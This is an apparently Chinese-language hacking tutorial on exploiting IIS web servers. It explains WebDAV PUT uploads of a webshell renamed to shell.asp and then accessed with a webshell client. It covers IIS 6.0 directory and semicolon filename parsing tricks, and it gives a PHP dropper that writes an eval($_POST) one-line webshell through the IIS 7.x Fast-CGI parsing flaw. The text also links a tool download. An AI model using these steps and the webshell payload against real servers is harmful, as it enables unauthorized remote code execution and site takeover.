IIS写权限漏洞

PUT写入漏洞

此漏洞主要是因为服务器开启了webdav的组件导致的

1.扫描漏洞,yes,可以PUT:

https://img.wenhairu.com/images/2019/01/23/iis0012.md.png

2.用老兵的工具上传一句话文件test.txt,然后move改名为shell.asp

https://img.wenhairu.com/images/2019/01/23/iis2.md.png

https://img.wenhairu.com/images/2019/01/23/iis4.md.png

然后菜刀连接成功:

https://img.wenhairu.com/images/2019/01/23/iis5.md.png

解析漏洞

影响版本:6.0、7.0、7.5

IIS 6.0解析利用方法有两种

1.目录解析

1
/xx.asp/xx.jpg

在网站下建立文件夹的名字为 .asp或.asa 的文件夹

其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行

2.文件解析

修改一句话文件名为test.asp;.jpg

在IIS6.0下,分号后面的不被解析,也就是说test.asp;.jpg会被服务器看成是mst.asp

还有IIS6.0 默认的可执行文件,除了asp还包含这三种:/mst.asa/mst.cer/mst.cdx

IIS 7.0/7.5畸形解析漏洞

在默认Fast-CGI开启状况下,黑阔上传一个名字为mst.jpg文件

内容为:

1
2
3
<?php
fputs(fopen(‘shell.php’,’w’),'<?php eval($_POST[wintry])?>’);
?>

然后访问mst.jpg/.php,在这个目录下就会生成一句话木马 shell.php

用到两个工具(完全可以用Burp替代):

1、IIS PUT Scaner By ZwelL
2、桂林老兵IIS写权限利用程序

https://pan.baidu.com/s/1PU70q4unoHt0S01oyuFnKw

第二个写入工具百度云不能分享,自行用Burp代替吧